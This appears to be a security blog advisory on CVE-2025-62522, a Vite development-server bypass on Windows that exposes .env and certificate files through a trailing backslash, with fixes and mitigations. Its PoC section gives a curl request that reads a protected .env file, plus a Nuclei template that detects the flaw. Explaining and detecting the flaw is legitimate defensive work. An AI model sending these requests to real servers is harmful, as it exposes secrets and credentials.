Listen to this Post
This vulnerability, identified as CVE-2025-62522, is a security bypass in Vite’s development server that operates specifically on Windows systems. The issue resides in how Vite processes URLs that end with a backslash (\), which causes the `server.fs.deny` mechanism to fail.
When a URL ends with a backslash, the internal path validation logic does not normalize the path correctly. As a result, a request for a protected file such as `/.env\` is incorrectly treated as a valid path, while the underlying Windows file system interprets the backslash as a valid path separator and successfully resolves the request to the real file.
The default `server.fs.deny` configuration includes sensitive file patterns like .env, .env., and `.{crt,pem}` to prevent direct access. However, because the path check is bypassed, an attacker can request `.env` using `/.env\` and retrieve the file’s contents.
This vulnerability affects only applications that meet the following conditions:
1. The Vite dev server is explicitly exposed to the network (via `–host` or `server.host` configuration).
2. The sensitive file resides in a directory allowed by server.fs.allow.
3. The dev server runs on Windows.
The root cause is that Node.js `fs.readFile(‘/foo.png/’)` loads /foo.png, and Vite uses the same behavior. By appending a backslash, the path matching for `server.fs.deny` fails, but the file system still serves the file.
The issue was fixed in Vite versions 5.4.21, 6.4.1, 7.0.8, and 7.1.11.
DailyCVE Form
Platform: Windows NTFS
Version: 2.9.18 – 7.1.10
Vulnerability: FS Deny Bypass
Severity: Medium (CVSS 6.0)
Date: 2025‑10‑20
Prediction: Patched already (Oct 2025)
What Undercode Say
The following commands and code snippets demonstrate the vulnerability and its detection.
PoC: Setup the Vulnerable Vite Server
$ npm create vite@latest vulnerable-app $ cd vulnerable-app $ echo "DB_PASSWORD=supersecret" > .env $ npm install $ npm run dev -- --host
Curl Request to Exploit CVE‑2025‑62522
$ curl --request-target "/.env\" http://localhost:5173 DB_PASSWORD=supersecret
Expected output: The contents of `.env` are returned to the browser, proving the bypass.
Nuclei Template Detection (CVE‑2025‑62522)
id: CVE-2025-62522
info:
name: Vite server.fs.deny Bypass via Backslash on Windows
author: Undercode
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/.env\"
matchers:
- type: word
words:
- "DB_PASSWORD"
- "API_KEY"
Exploit
An attacker can exploit CVE‑2025‑62522 by sending a simple GET request to the exposed Vite development server, appending a backslash to the path of a protected file (e.g., /.env\). The server, failing to block the backslash‑terminated path, reads the file and returns its content. This allows the attacker to retrieve environment variables, TLS certificates, and other sensitive files that match the `server.fs.deny` patterns. The attack requires no authentication and can be performed from any network location that can reach the dev server.
Protection
- Upgrade to Vite versions 5.4.21, 6.4.1, 7.0.8, or 7.1.11 or later.
- Do not expose the Vite development server to the network in production environments. Use `–host` only in controlled development settings.
- Apply input validation on URLs to reject paths ending with a backslash before they reach the `fs.readFile` function.
- Restrict network access to the dev server using firewalls or localhost binding if an upgrade is not immediately possible.
Impact
Successful exploitation of CVE‑2025‑62522 allows an unauthenticated remote attacker to read arbitrary files that are otherwise blocked by the `server.fs.deny` list. Common targets include `.env` files (containing API keys, database credentials, and other secrets) and certificate files (.crt, .pem). This can lead to complete compromise of the application’s sensitive data, enabling further attacks such as lateral movement, data exfiltration, and credential theft.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
